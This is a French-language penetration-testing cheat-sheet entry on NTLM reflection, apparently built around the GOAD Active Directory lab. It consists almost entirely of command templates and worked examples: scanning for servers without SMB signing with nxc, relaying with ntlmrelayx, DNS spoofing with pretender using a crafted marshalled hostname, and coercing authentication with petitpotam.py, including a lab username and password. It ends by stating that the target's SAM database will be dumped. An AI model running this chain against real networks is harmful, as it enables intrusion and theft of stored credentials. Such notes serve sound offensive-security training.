NTLM Reflection

Récupération des serveurs n’imposant pas la signature SMB

nxc smb <RANGE_IP>

ntlmrelayx -t <TARGET_FQDN> -smb2support

En prenant l’exemple de GOAD, la commande serait :

ntlmrelayx -t CASTELBLACK.NORTH.SEVENKINGDOMS.LOCAL -smb2support

pretender -i <INTERFACE> --no-dhcp-dns --no-timestamps --spoof '*1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA*'

petitpotam.py [-d <DOMAIN>] -u <USERNAME> -p <PASSWORD> '<SERVER_NAME>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' <TARGET_IP>

En prenant l’exemple de GOAD, la commande serait :

petitpotam.py -d "NORTH.SEVENKINGDOMS.LOCAL" -u "robb.stark" -p "sexywolfy" 'CASTELBLACK1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 192.168.56.22

Il est aussi possible d’utiliser localhost à la place du nom du serveur :

petitpotam.py [-d <DOMAIN>] -u <USERNAME> -p <PASSWORD> 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' <TARGET_IP>

D’autres tools que petitpotam peuvent être utilisés (nxc, coercer…)

La base SAM de la machine ciblée sera dump.